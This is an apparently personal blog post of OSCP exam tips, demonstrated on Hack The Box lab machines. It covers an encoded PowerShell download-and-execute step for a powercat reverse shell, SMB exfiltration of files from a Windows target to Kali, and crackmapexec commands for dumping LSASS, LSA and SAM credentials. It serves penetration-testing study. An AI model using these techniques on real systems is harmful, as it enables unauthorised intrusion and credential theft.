Six Things I Wish I Knew for the OSCP

![[Drawing-2.sketchpad.png]] May 20, 2023 ## PowerShell Encoding from the Command Line 💪🏿 To properly encode PowerShell against a Windows target, it must be first converted to UTF-16LE and then base64 encoded. The PWK course shows this conversion using an online tool, but it's simpler to do it all from the command line using the following one-liner. ``` echo "iex(cmd)" | iconv -t UTF-16LE | base64 -w 0 | xclip -sel clip ``` The following example is demonstrated on Hack The Box's [Love](https://app.hackthebox.com/machines/344). First, `powercat.ps1` is copied to the working directory and hosted on a Python web server. Second, a netcat listener is set up on port 4444 to catch the incoming reverse shell. Next, the PowerShell command to download and execute `powercat.ps1` is UTF-16LE encoded, base64 encoded, and copied to the clipboard. Using curl, the encoded PowerShell command is executed while manually URL encoding the spaces as `%20`. The command successfully executed as shown below by the reverse shell connection. ![[Peek 2023-05-19 22-28.gif]] Using an encoded PowerShell command to gain a reverse shell ## SMB File Transfer from Windows -> Linux 🔄 Often, you'll will find yourself trying to transfer a file from a Windows target to your attacking Kali Linux system, such as when pulling down SharpHound output. The easiest way to do this is using [Impacket's SMB Server](https://github.com/fortra/impacket). First, host a share on the attacking Kali Linux system by running `impacket-smbserver` with sudo privileges. Next, specify smb2support because SMB1 is disabled by default on modern versions of Windows. The "share" argument is the name of the share. Finally, the period at the end indicates the directory to save the input. In this case, the present working directory. ``` sudo impacket-smbserver -smb2support share . ``` Now on the target, run `copy` followed by the file to copy over. Next, designate the IP address of the attacking Kali Linux system. Usually, in an exam environment, it is the tun0 address. Finally, specify the name of the share, in this case, "share". ``` copy <file> \\<lhost>\share ``` Upon execution of the `copy` command, the SMB server should receive a connection back. After waiting a few moments, disconnect the SMB server using `CTRL + C`. The file should have successfully transferred over. The file's integrity can be verified using a hashing function. ![[Peek 2023-05-18 18-07.gif]] SMB file transfer from Windows to Linux of the file secret.txt ## The Power of WPScan's API 🔎 WordPress is among the most popular web content management systems out there. Whenever you come across a target running WordPress, the [WordPress Security Scanner](https://github.com/wpscanteam/wpscan) should be run to enumerate the system. The PEN-200 course covers this tool, but the material doesn't show how useful the API is. ``` wpscan --url <rhosts> --api-token <token> ``` The WPScan API will be demonstrated on Hack The Box's [Tenten](https://app.hackthebox.com/machines/8), a Linux machine running a vulnerable `job-manager` plugin on WordPress. First, without the API, WPScan identifies the `job-manager` plugin, but no further details about the plugin are displayed. After we add the API token, we get much more output, including two vulnerabilities for `job-manager` being identified: an IDOR and an XSS. I recommend registering for a free account [here](https://wpscan.com/register) and using the API. It will save you time! ![[Peek 2023-05-19 22-02.gif]] On the left, no WPScan API token. On right, with WPScan API token ## A Better Shell: rlwrap 🐚 GNU Readline is a software library that provides in-line editing of the command line including allowing users to move the text cursor over words, search command history, and use tab completion. The Readline Wrapper, "rlwrap", allows all those Readline features to work through any program including netcat or impacket-psexec. The result is a shell that is much easier to work with. On Hack The Box's [Active](https://app.hackthebox.com/machines/148), the difference between using and not using rlwrap is shown. The shell on the right can scroll up to previous commands and move the cursor over characters. Compare that to the shell on the left where the up and left arrow keys are interpreted incorrectly. Use rlwrap, it'll make your life easier! ![[Peek 2023-05-18 17-34.gif]] Without rlwrap on the left. With rlwrap on the right. ## Prevent Premature Interpretation in Bash 🐧 This section was inspired by the Information Goldmine PowerShell section of the PWK. Using winrm as `daveadmin` with the password `qwertyqwertyqwerty123!!`, the course material shows an example adding escape characters, `\`’s, to escape the `!`’s in the password. The password was enclosed by double quotes, and it would have been more correct and simpler to enclose the password in single quotes. The difference between a single quote and a double quote might seem trivial but it is important to understand how Bash, the most common tool you'll utilize during the OSCP course, works. In Bash, when a string is enclosed in single quotes, it preserves the literal value of each character. Meaning that no transformation or translation is done to the values of that string. Premature interpretation is depicted below in the top-right section of the gif. To Bash, the dual exclamation points mean replace me with the previous command, in this case, exit. Double quotes, on the other hand, will __NOT__ preserve the literal values of a given string. As shown in the bottom left of the gif, the shell needs for the `!` to be escaped out using a backslash character `\`. Single quotes should **ALWAYS** be used when inputting a password with a special character or else the authentication can fail due to the special character being interpreted by the shell before being sent. ![[Peek 2023-05-18 19-58.gif]] Top-left failed. Bottom-left worked but isn't ideal. The right using single quotes is best ## The Pentester's Swiss Army Knife: crackmapexec tips 🛠️ [crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec) is a powerful tool to manage credentials across FTP, RDP, WINRM, MSSQL, LDAP, SMB, and SSH. ``` crackmapexec <protocol> <rhost> -u <username> -p <password> <post-exploitation> ``` The tool comes with powerful post-exploitation features I'd like to highlight depicted below on Hack The Box's [Sauna](https://app.hackthebox.com/machines/229). Armed with credentials with sufficient privileges, one can execute the following post-exploitation commands without having to login to the system directly or download any additional tools manually. * Dumping LSASS using the `-M lsassy` option. * Dumping LSA using the `--lsa` option. * Dumping SAM using the `--sam` option. Bonus Tip * Using `-x [command]`, any command can be run from crackmapexec across multiple systems. It was useful for gathering flags missed during the PWK labs. Shout out to [RedTeamMedic](https://twitter.com/RedTeamMedic1) for teaching me this one! ![[Peek 2023-05-20 17-17.gif]]crackmapexec's post-exploitation abilities being displayed ## Bonus Apple Silicon Tip 🍎 Can you complete the OSCP on an ARM platform such as the M2 MacBooks? I'm happy to report that the answer is yes. You can download the Apple silicon version of Kali Linux using the link below. ![[Pasted image 20230518233208.png]] <center>https://www.kali.org/get-kali/#kali-installer-images</center> The first thing you should do after downloading Kali Linux for ARM is run the following command to allow the use of 64-bit applications. ``` sudo apt update sudo apt install -y qemu-user-static binfmt-support sudo dpkg --add-architecture amd64 sudo apt update sudo apt install libc6:amd64 ``` Source: https://www.kali.org/docs/arm/x86-on-arm/ Now if only Apple would add support for nested virtualization. 🙏🏿